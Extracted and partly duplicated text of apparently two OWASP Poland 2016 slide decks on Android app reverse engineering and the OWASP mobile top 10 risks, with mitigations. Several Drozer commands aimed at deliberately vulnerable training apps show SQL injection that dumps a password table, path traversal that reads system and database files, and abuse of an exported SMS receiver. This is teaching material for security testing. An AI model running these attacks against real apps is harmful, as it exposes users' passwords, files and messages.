httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
